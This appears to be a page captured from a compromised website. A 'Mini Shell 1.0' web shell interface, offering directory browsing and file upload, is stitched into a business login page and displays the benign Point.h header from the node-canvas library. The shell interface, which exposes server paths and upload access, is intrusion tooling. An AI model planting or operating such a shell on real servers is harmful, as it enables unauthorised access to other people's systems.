HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/node-app/node_modules/canvas/src/
Upload File :
Current File : //var/www/node-app/node_modules/canvas/src/Point.h
// Copyright (c) 2010 LearnBoost <tj@learnboost.com>
#pragma once

template <typename T>
class Point {
  public:
    T x, y;
    Point(T x=0, T y=0): x(x), y(y) {}
    Point(const Point&) = default;
    Point& operator=(const Point&) = default;
};